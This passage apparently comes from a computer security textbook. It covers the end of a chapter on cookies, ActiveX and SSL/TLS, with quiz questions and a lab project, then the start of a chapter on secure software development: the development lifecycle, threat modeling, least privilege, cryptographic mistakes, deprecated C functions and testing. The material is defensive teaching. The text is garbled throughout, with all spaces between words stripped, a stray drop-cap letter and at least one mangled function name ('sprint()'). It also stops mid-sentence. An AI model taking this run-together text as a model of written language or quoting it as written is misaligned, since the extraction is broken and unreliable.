ActiveXisarobustprogramminglanguagethatactslikeascriptinMicrosoftInternetExplorerbrowserstoprovidearichprogrammingenvironment.
Somescriptsorcodeelementscanbecalledfromtheserverside,creatingthewebenvironmentofASP.NETandPHP.
Usecookiestomaintainparametersbetweenwebpages
Cookiesaresmalltextfilesusedtomaintainstatebetweenwebpages.
Cookiescanbesetforpersistent(lastforadefinedtimeperiod)orsession(expirewhenthesessionisclosed).
Examineweb-basedapplicationsecurityissues
Asmoreapplicationsmovetoabrowserenvironmenttoeaseprogrammaticdeployment,itmakesiteasierforuserstoworkwithafamiliaruserenvironment.
Browsershavebecomepowerfulprogrammingenvironmentsthatperformmanyactionsbehindthescenesforauser,andmaliciousprogrammerscanexploitthishiddenfunctionalitytoperformactionsonauser’sPCwithouttheuser’sobviousconsent.
KeyTermsActiveServerPages(ASP)(547)ActiveX(545)ASP.NET(547)Authenticode(545)bufferoverflow(542)codesigning(551)CommonGatewayInterface(CGI)(546)
cookie(547)FileTransferProtocol(FTP)(540)HypertextMarkupLanguage(HTML)(530)inlining(552)InternetEngineeringTaskForce(IETF)(532)Java(542)JavaScript(544)LightweightDirectoryAccessProtocol(LDAP)(539)PHP(547)plug-in(550)SecureSocketsLayer(SSL)(531)server-sidescripting(547)SSLstrippingattack(538)TransportLayerSecurity(TLS)(532)UniformResourceLocator(URL)(530)X.500(539)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.Theuseof_______________canvalidateinputresponsesfromclientsandpreventcertainattackmethodologies.
2.A(n)_______________isasmalltextfileusedtoenhancewebsurfingbycreatingalinkbetweenpagesvisitedonawebsite.
3._______________or_______________isatechnologyusedtosupportconfidentialityacrosstheInternetforwebsites.
4.A(n)_______________isasmallapplicationprogramthatincreasesabrowser’sabilitytohandlenewdatatypesandaddnewfunctionality.
5.Anapplication-levelprotocolthatoperatesoverawiderangeoflower-levelprotocolsandisusedtotransferfilesis_______________.
6._______________fileshavethe.ocxextensiontoidentifythem.7._______________isthestandardfordirectoryservices.8.Addingadigitalsignatureandadigitalcertificatetoaprogramfile
todemonstratefileintegrityandauthenticityis_______________.
9.A(n)_______________isadescriptorwherecontentislocatedontheInternet.
10._______________isasystemthatusesdigitalsignaturesandallowsWindowsuserstodeterminewhoproducedaspecificpieceofcodeandwhetherornotthecodehasbeenaltered.
Multiple-ChoiceQuiz1.Whatisacookie?
A.Apieceofdatainadatabasethatenhanceswebbrowsercapability
B.AsmalltextfileusedinsomeHTTPexchanges
C.Asegmentofscripttoenhanceawebpage
D.Aprogramthatrunswhenyouvisitawebsitesoitremembersyou
2.TheuseofcertificatesinSSL/TLSissimilarto:A.Areceiptprovingpurchase
B.Havinganotarynotarizeasignature
C.Ahistoricalrecordofaprogram’slineage
D.Noneoftheabove
3.SecurityforJavaScriptisestablishedbywhom?A.Thedeveloperatthetimeofcodedevelopment.
B.Theuseratthetimeofcodeusage.
C.Theuserthroughbrowserpreferences.
D.SecurityforJavaScriptisnotnecessary—theJavalanguageissecurebydesign.
4.ActiveXcanbeusedforwhichofthefollowingpurposes?A.Addfunctionalitytoabrowser
B.Updatetheoperatingsystem
C.BothAandB
D.NeitherAnorB
5.Thekeyword[secure]inacookie:A.Causesthesystemtoencryptitscontents
B.PreventsthecookiefrompassingoverHTTPconnections
C.Tellsthebrowserthatthecookieisasecurityupgrade
D.Noneoftheabove
6.Codesigningisusedto:A.Allowauthorstotakeartisticcreditfortheirhardwork
B.Provideamethodtodemonstratecodeintegrity
C.Guaranteecodefunctionality
D.Preventcopyrightinfringementbycodecopying
7.SSLprovideswhichofthefollowingfunctionality?
A.Dataintegrityservices
B.Authenticationservices
C.Dataconfidentialityservices
D.Alloftheabove
8.High-securitybrowserscanusewhattovalidateSSLcredentialsforauser?
A.AESencryptedlinkstoarootserver
B.Anextended-validationSSLcertificate
C.MD5hashingtoensureintegrity
D.SSLv3.0
9.ToestablishanSSLconnectionfore-mailandHTTPacrossafirewall,youmust:
A.OpenTCPports80,25,443,and223.
B.OpenTCPports443,465,and995.
C.OpenaTCPportofchoiceandassignittoallSSLtraffic.
D.Donothing;SSLtunnelspastfirewalls.
10.Topreventtheuseofcookiesinabrowser,ausermust:A.Tellthebrowsertodisablecookiesviaasetupoption.
B.Deleteallexistingcookies.
C.BothAandB.
D.Theuserneeddonothing;bydesign,cookiesarenecessaryandcannotbetotallydisabled.
EssayQuiz
1.MuchhasbeenmadeofthenewWeb2.0phenomenon,includingsocialnetworkingsitesanduser-createdmash-ups.HowdoesWeb2.0changesecurityfortheInternet?
LabProject
•LabProject17.1Cookiesandscriptscanbothenhancewebbrowsingexperiences.Theycanalsorepresentarisk,andassuchtheoptionexiststoturnthemoff.UsingFirefoxwiththeNoScriptplug-intodisablescripts,comparethebrowsingexperienceatthefollowingsiteswithandwithoutcookies,andwithandwithoutscripts:
E-commercesitelikeAmazonAbank
AninformationsitelikeWikipediaAnewssite
chapter18 SecureSoftwareDevelopment
SecurityFeatures!=SecureFeatures
—MICHAELHOWARD,MICROSOFTCORPORATION
S
Inthischapter,youwilllearnhowto
Describehowsecurecodingcanbeincorporatedintothesoftwaredevelopmentprocess
Listthemajortypesofcodingerrorsandtheirrootcauses
Describegoodsoftwaredevelopmentpracticesandexplainhowtheyimpactapplicationsecurity
Describehowusingasoftwaredevelopmentprocessenforcessecurityinclusioninaproject
Learnaboutapplicationhardeningtechniques
oftwareengineeringisthesystematicdevelopmentofsoftwaretofulfillavarietyoffunctions,suchasbusiness,recreational,scientific,andeducationalfunctions,whicharejustafewofthemanyareaswhere
softwarecomesinhandy.Regardlessofthetypeofsoftware,thereisauniversalrequirementthatthesoftwareworkproperly,performthedesiredfunctions,andperformtheminthecorrectfashion.Thefunctionalityofsoftwarerangesfromspreadsheetsthataccuratelyaddfigures,topacemakersthatstimulatetheheart.Developersknowthatfunctionalspecificationsmustbemetforthesoftwaretobesatisfactory.Softwareengineering,then,fitsasmanyrequirementsaspossibleintotheprojectmanagementscheduletimeline.Butwithanalystsanddevelopersworkingovertimetogetasmanyfunctionalelementscorrectaspossible,theissueofnonfunctionalrequirementsoftengetspushedtothebackburner,orneglectedentirely.Securityhasbeendescribedasanonfunctionalrequirement.Thisplaces
itintoacategoryofsecondaryimportanceformanydevelopers.Theirviewisthatiftimelines,schedules,andbudgetsareallinthegreen,thenmaybetherewillbetimetodevotetosecurityprogramming.Aswedependmoreandmoreoncomputersdrivenbysoftware,wewillneedsystemstodothesame—tonotonlyfunctionnow,buttobeprotectedfrommalfunctioninthefuture.
TheSoftwareEngineeringProcessSoftwaredoesnotbuilditself.Thisisgoodnewsforsoftwaredesigners,analysts,programmers,andthelike,forthecomplexityofdesigningandbuildingsoftwareenablesthemtoengageinwell-payingcareers.Toachievecontinuedsuccessinthisdifficultworkenvironment,softwareengineeringprocesseshavebeendeveloped.Ratherthanjustsittingdownandstartingtowritecodeattheonsetofaproject,softwareengineersuseacompletedevelopmentprocess.Thereareseveralmajorcategoriesofsoftwareengineeringprocesses.Thewaterfallmodel,thespiralmodel,andtheevolutionarymodelaremajorexamples.Withineachofthesemajorcategories,therearenumerousvariations,andeachgroupthenpersonalizestheprocesstotheirprojectrequirementsandteamcapabilities.
Thischaptercontainsmanydetailsofhowtotestforexploitablevulnerabilitiesinsoftware.Donotperformorattemptthesestepsoutsideofsystemsforwhichyoueitherare,orhaveexplicitpermissionfrom,theowner.Otherwise,youmayfindyourselfbeingaccusedofhackingandpossiblyevenfacinglegalcharges.
Traditionally,securityisanadd-onitemthatisincorporatedintoasystemafterthefunctionalrequirementshavebeenmet.Itisnotanintegralpartofthesoftwaredevelopmentlifecycleprocess.Thisplacesitatoddswithbothfunctionalandlifecycleprocessrequirements.Theresolutiontoalloftheseissuesisrelativelysimple:incorporatesecurityintotheprocessmodelandbuilditintotheproductalongwitheachfunctionalrequirement.Thechallengeisinhowtoaccomplishthisgoal.Therearetwoseparateandrequiredelementsneededtoachievethisobjective.First,theinclusionofsecurityrequirementsandmeasuresinthespecificprocessmodelbeingused.Second,theuseofsecurecodingmethodstopreventopportunitiestointroducesecurityfailuresintothe
software’sdesign.
ProcessModelsThereareseveralmajorsoftwareengineeringprocessmodels,eachwithslightlydifferentstepsandsequences,yettheyallhavemanysimilaritems.Thewaterfallmodelischaracterizedbyamultistepprocessinwhichstepsfolloweachotherinalinear,one-wayfashion,likewateroverawaterfall.Thespiralmodelhasstepsinphasesthatexecuteinaspiralfashion,repeatingatdifferentlevelswitheachrevolutionofthemodel.Theagilemodelischaracterizedbyiterativedevelopment,whererequirementsandsolutionsevolvethroughanongoingcollaborationbetweenself-organizingcross-functionalteams.Theevolutionarymodelisaniterativemodeldesignedtoenabletheconstructionofincreasinglycomplexversionsofaproject.Therearenumerousothermodelsandderivationsinusetoday.Thedetailsoftheseprocessmodelsareoutsidethescopeofthisbook,andmostofthedetailisnotsignificantlyrelevanttotheissueofsecurity.Fromasecurecodingperspective,asecuredevelopmentlifecycle(SDL)modelisessentialtosuccess.Fromrequirementstosystemarchitecturetocodingtotesting,securityisanembeddedpropertyinallaspectsoftheprocess.Thereareseveralspecificitemsofsignificancewithrespecttosecurity.Fourprimaryitemsofinterest,regardlessoftheparticularmodelormethodologyemployedinsoftwarecreation,arerequirements,design,coding,andtestingphases.Thesephasesaredescribedinthefollowingsection.
SecureDevelopmentLifecycleTheremaybeasmanydifferentsoftwareengineeringmethodsastherearesoftwareengineeringgroups.Butananalysisofthesemethodsindicatesthatmostsharecommonelementsfromwhichanunderstandingofauniversalmethodologycanbeobtained.Fordecades,securecoding—thatis,creatingcodethatdoeswhatitissupposedtodo,andonlywhatitis
supposedtodo—hasnotbeenhighontheradarformostorganizations.Thepastdecadeofexplosiveconnectivityandtheriseofmalwareandhackershaveraisedawarenessofthisissuesignificantly.Arecentallianceofseveralmajorsoftwarefirmsconcernedwithsecurecodingprinciplesrevealedseveralinterestingpatterns.First,theywereallattackingtheproblemusingdifferentmethodologies,butyetinsurprisinglysimilarfashions.Second,theyfoundaseriesofprinciplesthatappearstoberelatedtosuccessinthisendeavor.Firstandforemost,recognitionoftheneedtoincludesecurecoding
principlesintothedevelopmentprocessisacommonelementamongallfirms.MicrosofthasbeenveryopenandvocalaboutitsimplementationofitsSecurityDevelopmentLifecycle(SDL)andhaspublishedsignificantvolumesofinformationsurroundingitsgenesisandevolution(https://www.microsoft.com/en-us/sdl/default.aspx).TheSoftwareAssuranceForumforExcellenceinCode(SAFECode)is
anorganizationformedbysomeoftheleadingsoftwaredevelopmentfirmswiththeobjectiveofadvancingsoftwareassurancethroughbetterdevelopmentmethods.SAFECode(www.safecode.org)membersincludeEMC,Microsoft,andIntel.AnexaminationofSAFECodemembers’processesrevealsanassertionthatsecurecodingmustbetreatedasanissuethatexiststhroughoutthedevelopmentprocessandcannotbeeffectivelytreatedatafewcheckpointswithchecklists.Regardlessofthesoftwaredevelopmentprocessused,thefirststepdownthepathtosecurecodingistoinfusetheprocesswithsecurecodingprinciples.
ThreatModelingandAttackSurfaceAreaMinimizationTwoimportanttoolshavecomefromthesecurecodingrevolution:threatmodelingandattacksurfaceareaminimization.Attacksurfaceareaminimizationisastrategytoreducetheplaceswherecodecanbeattacked.Thesecondmajordesigneffortisonebuiltaroundthreatmodeling,the
processofanalyzingthreatsandtheirpotentialeffectsonsoftwareinaveryfinelydetailedfashion.Theoutputofthethreatmodelprocessisacompilationofthreatsandhowtheyinteractwiththesoftware.This
informationiscommunicatedacrossthedesignandcodingteam,sothatpotentialweaknessescanbemitigatedbeforethesoftwareisreleased.
StepbyStep18.1
ThreatModelingStepsFollowthestepsusedtoconductthreatmodeling.
RequirementsPhaseTherequirementsphaseshoulddefinethespecificsecurityrequirementsifthereisanyexpectationofthembeingdesignedintotheproject.Regardlessofthemethodologyemployed,theprocessisallaboutcompletingtherequirements.Securecodingdoesnotrefertoaddingsecurityfunctionalityintoapieceofsoftware.Securityfunctionalityisastandalonerequirement.Theobjectiveofthesecurecodingprocessistoproperlyimplementthisandallotherrequirements,sothattheresultantsoftwareperformsasdesiredandonlyasdesired.Therequirementsprocessisakeycomponentofsecurityinsoftware
development.Security-relateditemsenumeratedduringtherequirementsprocessarevisiblethroughouttherestofthesoftwaredevelopmentprocess.Theycanbearchitectedintothesystemsandsubsystems,addressedduringcoding,andtested.Forthesubsequentstepstobeeffective,thesecurityrequirementsneedtobebothspecificandpositive.Requirementssuchas“makesecurecode”or“noinsecurecode”arenonspecificandnothelpfulintheoverallprocess.Specificrequirementssuchas“preventunhandledbufferoverflowsandunhandledinputexceptions”canbespecificallycodedforineachpieceofcode.
TechTip
CommonSecureCodingRequirementsCommonsecurecodingrequirementsinclude:
AnalysisofsecurityandprivacyriskAuthenticationandpasswordmanagement
AuditloggingandanalysisAuthorizationandrolemanagement
Codeintegrityandvalidationtesting
Cryptographyandkeymanagement
DatavalidationandsanitizationNetworkanddatasecurity
OngoingeducationandawarenessTeamstaffingrequirements
Third-partycomponentanalysis
Duringtherequirementsactivity,itisessentialthattheproject/programmanagerandanybusinessleaderswhosetschedulesandallocateresourcesareawareoftheneedandrequirementsofthesecuredevelopmentprocess.Thecostofaddingsecurityatalatertimerisesexponentially,withthemostexpensiveformbeingthecommonrelease-and-patchprocessusedbymanyfirms.Thedevelopmentofbothfunctionalandnonfunctionalsecurityrequirementsoccursintandemwithotherrequirementsthroughthedevelopmentofusecases,analysisofcustomerinputs,implementationofcompanypolicies,andcompliancewithindustrybestpractices.Dependingonthenatureofaparticularmodule,specialattentionmaybefocusedonsensitiveissuessuchaspersonallyidentifiableinformation(PII),sensitivedata,orintellectualpropertydata.Oneoftheoutputsoftherequirementsphaseisasecuritydocumentthat
helpsguidetheremainingaspectsofthedevelopmentprocess,ensuringthatsecurecoderequirementsarebeingaddressed.Theserequirementscanbeinfusedintodesign,coding,andtesting,ensuringtheyareaddressedthroughoutthedevelopmentprocess.
DesignPhaseCodingwithoutdesigningfirstislikebuildingahousewithoutusingplans.Thismightworkfineonsmallprojects,butasthescopegrows,sodocomplexityandtheopportunityforfailure.Designingasoftwareprojectisamultifacetedprocess.Justastherearemanywaystobuildahouse,therearemanywaystobuildaprogram.Designisaprocessinvolvingtrade-offsandchoices,andthecriteriausedduringthedesign
decisionscanhavelastingimpactsonprogramconstruction.Therearetwosecurecodingprinciplesthatcanbeappliedduringthedesignphasethatcanhavealargeinfluenceonthecodequality.Thefirstoftheseistheconceptofminimizingattacksurfacearea.Reducingtheavenuesofattackavailabletoahackercanhaveobviousbenefits.Minimizingattacksurfaceareaisaconceptthattendstoruncountertothewaysoftwarehasbeendesigned—mostdesignscomeasaresultofincrementalaccumulation,addingfeaturesandfunctionswithoutregardtomaintainability.
CodingPhaseThepointatwhichthedesignisimplementedisthecodingstepinthesoftwaredevelopmentprocess.Theactofinstantiatinganideaintocodeisapointwhereanerrorcanentertheprocess.Theseerrorsareoftwotypes:thefailuretoincludedesiredfunctionality,andtheinclusionofundesiredbehaviorinthecode.Testingforthefirsttypeoferrorisrelativelyeasyiftherequirementsareenumeratedinapreviousphaseoftheprocess.Testingfortheinclusionofundesiredbehaviorissignificantlymore
difficult.Testingforanunknownisavirtuallyimpossibletask.Whatmakesthispossibleatallistheconceptoftestingforcategoriesofpreviouslydeterminederrors.Severalclassesofcommonerrorshavebeenobserved.EnumerationsofknownsoftwareweaknessesandvulnerabilitieshavebeencompiledandpublishedastheCommonWeaknessEnumeration(CWE)andCommonVulnerabilitiesandExposures(CVE)bytheMITRECorporation,agovernment-fundedresearchgroup(www.mitre.org).Theseenumerationshaveenabledsignificantadvancementinthedevelopmentofmethodstoreducecodevulnerabilities.TheCVEandCWEarevendor-andlanguage-neutralmethodsofdescribingerrors.Theseenumerationsallowacommonvocabularyforcommunicationaboutweaknessesandvulnerabilities.Thiscommonvocabularyhasalsoledtothedevelopmentofautomatedtoolstomanagethetrackingoftheseissues.Therearemanycommoncodingerrors,butsomeoftheprimaryand
mostdamagingareleastprivilegeviolationsandcryptographicfailures.
Language-specificfailuresareanothercommonsourceofvulnerabilities.Thereareseveralwaystogoaboutsearchingforcodingerrorsthatlead
tovulnerabilitiesinsoftware.Onemethodisbymanualcodeinspection.Developerscanbetrainedto“notmakemistakes,”butthisapproachhasnotprovensuccessful.Thishasledtothedevelopmentofaclassoftoolsdesignedtoanalyzecodeforpotentialdefects.Staticcode-analysistoolsareatypeoftoolthatcanbeusedtoanalyze
softwareforcodingerrorsthatcanleadtoknowntypesofvulnerabilitiesandweaknesses.Sophisticatedstaticcodeanalyzerscanexaminecodebasestofindfunctioncallsofunsafelibraries,potentialbuffer-overflowconditions,andnumerousotherconditions.Currently,theCWEdescribesmorethan750differentweaknesses,fartoomanyfordevelopermemoryanddirectknowledge.Inlightofthis,andduetothefactthatsomeweaknessesaremoreprevalentthanothers,MITREhascollaboratedwithSANStodeveloptheCWE/SANSTop25MostDangerousSoftwareErrorslist.OneoftheideasbehindtheTop25lististhatitcanbeupdatedperiodicallyasthethreatlandscapechanges.Explorethecurrentlistingathttp://cwe.mitre.org/top25/.Therearetwomainenumerationsofcommonsoftwareerrors:theTop
25listmaintainedbyMITREandtheOWASPTopTenlistforwebapplications.Dependingonthetypeofapplicationbeingevaluated,theselistsprovideasolidstartingpointforsecurityanalysisofknownerrortypes.MITREistherepositoryoftheindustrystandardlistforstandardprograms,andOWASPisforwebapplications.Asthecausesofcommonerrorsdonotchangequickly,theselistsarenotupdatedeveryyear.
LeastPrivilegeOneofthecentralparadigmsofsecurityisthenotionofrunningaprocesswiththeleastrequiredprivilege.Leastprivilegerequiresthatthedeveloperunderstandwhatprivilegesareneededspecificallyforanapplicationtoexecuteandaccessallitsnecessaryresources.Obviously,fromadeveloperpointofview,itwouldbeeasiertouseadministrative-levelpermissionforalltasks,whichremovesaccesscontrolsfromtheequation,butthisalsoremovestheveryprotectionsthat
access-levelcontrolsaredesignedtoprovide.Theotherendofthespectrumissoftwaredesignedforoperatingsystemswithoutanybuilt-insecurity,suchasearlyversionsofWindowsandsomemainframeOSs,wheresecuritycomesintheformofanapplicationpackage.Whenmigratingtheseapplicationstoplatforms,theissueofaccesscontrolsarises.Asdevelopersincreasinglyaretaskedwithincorporatingsecurityinto
theirwork,thenaturaltendencyistocodearoundthis“new”securityrequirement,developinginthesamefashionasbefore,asifsecurityisnotanissue.Thisiscommonlymanifestedasaprogramthatrunsonlyunderanadministrative-levelaccount,orrunsasaserviceutilizingtheSYSTEMaccountforpermissionsinWindows.Bothofthesepracticesarebadpracticesthatreducesecurity,introducehard-to-fixerrors,andproducecodethatishardertomaintainandextend.
TechTip
2011CWE/SANSTop25MostDangerousSoftwareErrors?SQLInjectionOSCommandInjectionBufferOverflowCross-SiteScripting(XSS)MissingAuthenticationforCriticalFunctionMissingAuthorizationUseofHard-codedCredentialsMissingEncryptionofSensitiveDataUnrestrictedUploadofFilewithDangerousTypeRelianceonUntrustedInputsinaSecurityDecisionExecutionwithUnnecessaryPrivilegesCross-SiteRequestForgery(CSRF)ImproperLimitationofaPathnametoaRestrictedDirectory(‘PathTraversal’)DownloadofCodeWithoutIntegrityCheckIncorrectAuthorizationInclusionofFunctionalityfromUntrustedControlSphereIncorrectPermissionAssignmentforCriticalResourceUseofPotentiallyDangerousFunction
UseofaBrokenorRiskyCryptographicAlgorithmIncorrectCalculationofBufferSizeImproperRestrictionofExcessiveAuthenticationAttemptsURLRedirectiontoUntrustedSite(‘OpenRedirect’)UncontrolledFormatStringIntegerOverfloworWraparoundUseofaOne-WayHashwithoutaSalt
DeveloperswhododevelopmentandtestingonanintegratedenvironmentontheirownPC—thatis,theyhaveawebserverand/ordatabaseengineontheirPC—canproducecodethatworksfineontheirmachine,whereunifiedaccountpermissionsexist(andarefrequentlyadministrator).Whenthiscodeistransitionedtoadistributedenvironment,permissionscanbecomeanissue.Thepropermethodistomanagepermissionsappropriatelyonthedeveloperboxfromthebeginning.
Thekeyprincipleindesigningandcodingsoftwarewithrespecttoaccess-levelcontrolsistoplanandunderstandthenatureofthesoftware’sinteractionwiththeoperatingsystemandsystemresources.Wheneverthesoftwareaccessesafile,asystemcomponent,oranotherprogram,theissueofappropriateaccesscontrolneedstobeaddressed.Andalthoughthesimplepracticeofjustgivingeverythingrootoradministrativeaccessmaysolvethisimmediateproblem,itcreatesmuchbiggersecurityissuesthatwillbemuchlessapparentinthefuture.Anexampleiswhenaprogramrunscorrectlywheninitiatedfromanadministratoraccountbutfailswhenrunundernormaluserprivileges.Theactualfailuremaystemfromaprivilegeissue,buttheactualpointoffailureinthecodemaybemanyproceduresaway,anddiagnosingthesetypesoffailuresisadifficultandtime-consumingoperation.
Whensoftwarefailsduetoanexploitedvulnerability,thehackertypicallyachieveswhateverlevelofprivilegethattheapplicationhadpriortotheexploitoccurrence.Ifanapplicationalwaysoperateswithroot-levelprivilege,thiswillpassontothehackeraswell.
Thebottomlineisactuallysimple.Determinewhatneedstobeaccessedandwhattheappropriatelevelofpermissionis,thenusethatlevelindesignandimplementation.Repeatthisforeveryitemaccessed.Intheend,itisrarethatadministrativeaccessisneededformanyfunctions.Oncetheapplicationisdesigned,thewholeprocesswillneedtoberepeatedwiththeinstallationprocedure,becausefrequently,installingsoftwarewillneedahigherlevelofaccessthanneededforexecutingthesoftware.Designandimplementationdetailsmustbedeterminedwithrespecttorequiredpermissionlevels,nottoahigherlevelsuchasadministrativerootaccessjustforconvenience.Thecostoffailuretoheedtheprincipleofleastprivilegecanbe
twofold.First,youhaveexpensive,time-consumingaccess-violationerrorsthatarehardtotrackdownandcorrect.Thesecondproblemiswhenanexploitisfoundthatallowssomeotherprogramtouseportionsofyourcodeinanunauthorizedfashion.AprimeexampleisthesendmailexploitintheUNIXenvironment.Becausesendmailrequiresroot-levelaccessforsomefunctions,thesendmailexploitinsertsforeigncodeintotheprocessstream,thereuponexecutingitscodeatroot-levelaccessbecausethesendmailprocessthreaditselfhasroot-levelaccess.Inthiscase,sendmailneedstheroot-levelaccess,butthisexploitillustratesthattheriskisrealandwillbeexploitedoncefound.Properdesigncan,inmanycases,eliminatetheneedforsuchhighaccessprivilegelevels.
CryptographicFailuresHailedasasolutionforallproblems,cryptographyhasasmuchchanceofbeingtheultimatecure-allasdidthetonicssoldbytravelingsalesmenofadifferentera.Thereisnosuchthingasauniversalsolution,yettherearesomeveryversatiletoolsthatprovideawiderangeofprotections.Cryptographyfallsintothis“veryusefultool”category.Properuseofcryptographycanprovideawealthofprogrammaticfunctionality,fromauthenticationandconfidentialityto
integrityandnonrepudiation.Thesearevaluabletools,andmanyprogramsrelyonpropercryptographicfunctionforimportantfunctionality.Theneedforthisfunctionalityinanapplicationtemptsprogrammerstorolltheirowncryptographicfunctions.Thisisataskfraughtwithopportunityforcatastrophicerror.Cryptographicerrorscomefromseveralcommoncauses.Onetypical
mistakeischoosingtodevelopyourowncryptographicalgorithm.Developmentofasecurecryptographicalgorithmisfarfromaneasytask,andevenwhendonebyexperts,weaknessescanoccurthatmakethemunusable.Cryptographicalgorithmsbecometrustedafteryearsofscrutinyandattacks,andanynewalgorithmswouldtakeyearstojointhetrustedset.Ifyouinsteaddecidetorestonsecrecy,bewarnedthatsecretorproprietaryalgorithmshaveneverprovidedthedesiredlevelofprotection.Oneoftheaxiomsofcryptographyisthatthereisnosecuritythroughobscurity.
TechTip
OnlyUseApprovedCryptographicFunctionsAlwaysusevettedandapprovedlibrariesforallcryptographicwork.Nevercreateyourowncryptographicfunctions,evenwhenusingknownalgorithms.Forexample,the.NETFrameworkhasanumberofcryptographyclassesthatdeveloperscancallupontoperformencryptionservices.
Decidingtouseatrustedalgorithmisaproperstart,buttherestillareseveralmajorerrorsthatcanoccur.Thefirstisanerrorininstantiatingthealgorithm.Aneasywaytoavoidthistypeoferroristousealibraryfunctionthathasalreadybeenproperlytested.Sourcesoftheselibraryfunctionsabound,andtheyprovideaneconomicalsolutiontothisfunctionality’sneeds.Onceyouhaveanalgorithm,andhavechosenaparticularinstantiation,thenextitemneededistherandomnumbertogeneratearandomkey.Cryptographicfunctionsuseanalgorithmandakey,thelatterbeingadigitalnumber.
Thegenerationofarealrandomnumberisnotatrivialtask.Computersaremachinesthatarerenownedforreproducingthesameoutputwhengiventhesameinput,sogeneratingapure,nonreproduciblerandomnumberisachallenge.Therearefunctionsforproducingrandomnumbersbuiltintothelibrariesofmostprogramminglanguages,butthesearepseudorandomnumbergenerators,andalthoughthedistributionofoutputnumbersappearsrandom,itgeneratesareproduciblesequence.Giventhesameinput,asecondrunofthefunctionwillproducethesamesequenceof“random”numbers.Determiningtheseedandrandomsequenceandusingthisknowledgeto“break”acryptographicfunctionhasbeenusedmorethanoncetobypassthesecurity.ThismethodwasusedtosubvertanearlyversionofNetscape’sSSLimplementation.Usinganumberthatiscryptographicallyrandom—suitableforanencryptionfunction—resolvesthisproblem,andagaintheuseoftrustedlibraryfunctionsdesignedandtestedforgeneratingsuchnumbersisthepropermethodology.
ExamTip:Neverhard-codesecretsintocodebases.Hackerscanusedisassemblersandvariouscodedifferentialtoolstodissectyourcodeandfindstaticinformation.
Nowyouhaveagoodalgorithmandagoodrandomnumber—sowherecanyougowrong?Well,storingprivatekeysinareaswheretheycanberecoveredbyanunauthorizedpersonisthenextworry.Poorkeymanagementhasfailedmanyacryptographicimplementation.AfamousexploitofgettingcryptographickeysfromanexecutableandusingthemtobreakacryptographicschemeisthecaseofhackersusingthisexploittobreakDVDencryptionanddeveloptheDeCSSprogram.Toolshavebeendevelopedthatcansearchcodefor“random”keysandextractthekeyfromthecodeorrunningprocess.Thebottomlineissimple:donothard-codesecretkeysinyourcode.Theycan,andwill,bediscovered.Keysshouldbegenerated,andthenpassedbyreference,minimizingthetravel
ofcopiesacrossanetworkorapplication.Storingtheminmemoryinanoncontiguousfashionisalsoimportant,topreventexternaldetection.Again,trustedcryptographiclibraryfunctionscometotherescue.Youmighthavededucedbythispointthattheterm“libraryfunction”
hasbecomesynonymouswiththissection.Thisisnotanaccident.Infact,thisisprobablyoneofthebestpiecesofadvicefromthischapter:usecommerciallyprovenfunctionsforcryptographicfunctionality.
TechTip
MicrosoftRecommendedDeprecatedCFunctionsFunctionfamiliestodeprecate/remove:
strcpy()andstrncpy()strcat()andstrncat()
scanf()sprint()
gets()memcpy(),CopyMemory(),andRtlCopyMemory()
Language-SpecificFailuresModernprogramminglanguagesarebuiltaroundlibrariesthatpermitreuseandspeedthedevelopmentprocess.Thedevelopmentofmanylibrarycallsandfunctionswasdonewithoutregardtosecurecodingimplications,andthishasledtoissuesrelatedtospecificlibraryfunctions.Asmentionedpreviously,strcpy()hashaditsfairshareofinvolvementinbufferoverflowsandshouldbeavoided.Developingandmaintainingaseriesofdeprecatedfunctionsandprohibitingtheiruseinnewcode,whileremovingthemfromoldcodewhenpossible,isaprovenpathtowardmoresecurecode.Bannedfunctionsareeasilyhandledviaautomatedcodereviewsduring
thecheck-inprocess.Thechallengeisingarneringthedeveloperawarenessastothepotentialdangersandthevalueofsafercoding
practices.
TestingPhaseIftherequirementsphasemarksthebeginningofthegenerationofsecurityincode,thenthetestingphasemarkstheotherboundary.Althoughthereareadditionalfunctionsaftertesting,noonewantsausertovalidateerrorsincode.Anderrorsdiscoveredafterthecodehasshippedarethemostexpensivetofix,regardlessoftheseverity.Employingusecasestocompareprogramresponsestoknowninputsandthencomparingtheoutputtothedesiredoutputisaprovenmethodoftestingsoftware.Thedesignofusecasestotestspecificfunctionalrequirementsoccursbasedontherequirementsdeterminedintherequirementsphase.Providingadditionalsecurity-relatedusecasesistheprocess-drivenwayofensuringthatsecurityspecificsarealsotested.Thetestingphaseisthelastopportunitytodeterminethatthesoftware
performsproperlybeforetheenduserexperiencesproblems.Errorsfoundintestingarelateinthedevelopmentprocess,butatleasttheyarestilllearnedaboutinternally,beforetheendcustomersuffers.Testingcanoccurateachlevelofdevelopment:module,subsystem,system,andcompletedapplication.Thesoonererrorsarediscoveredandcorrected,thelowerthecostandthelessertheimpactwillbetoprojectschedules.Thismakestestinganessentialstepintheprocessofdevelopinggoodprograms.Testingforsecurityrequiresamuchbroaderseriesofteststhan
functionaltestingdoes.Misusecasescanbeformulatedtoverifythatvulnerabilitiescannotbeexploited.Fuzztesting(alsoknownasfuzzing)usesrandominputstocheckforexploitablebufferoverflows.Codereviewsbydesignanddevelopmentteamsareusedtoverifythatsecurityelementssuchasinputandoutputvalidationarefunctional,asthesearethebestdefensesagainstawiderangeofattacks,includingcross-sitescriptingandcross-siterequestforgeries.Codewalkthroughsbeginwithdesignreviews,architectureexaminations,unittesting,subsystemtesting,and,ultimately,completesystemtesting.
Testingincludeswhite-boxtesting,wherethetestteamhasaccesstothedesignandcodingelements;black-boxtesting,wheretheteamdoesnothaveaccess;andgrey-boxtesting,wherethetestteamhasmoreinformationthaninblack-boxtestingbutnotasmuchasinwhite-boxtesting.Thesemodesoftestingareusedfordifferentobjectives;forexample,fuzztestingworksperfectlyfineregardlessofthetypeoftesting,whereascertaintypesofpenetrationtestsarebetterinawhite-boxtestingenvironment.Testingisalsoperformedontheproductioncodetoverifythaterrorhandlingandexceptionreporting,whichmayprovidedetaileddiagnosticinformationduringdevelopment,aresquelchedtopreventinformationreleaseduringerrorconditions.Finalcodecanbesubjectedtopenetrationtests,designedspecificallyto
testconfiguration,securitycontrols,andcommondefensessuchasinputandoutputvalidationanderrorhandling.Penetrationtestingcanexplorethefunctionalityandwhetherornotspecificsecuritycontrolscanbebypassed.Usingtheattacksurfaceanalysisinformation,penetrationtesterscanemulateadversariesandattemptawiderangeofknownattackvectorsinordertoverifythattheknownmethodsofattackareallmitigated.Oneofthemostpowerfultoolsthatcanbeusedintestingisfuzzing,the
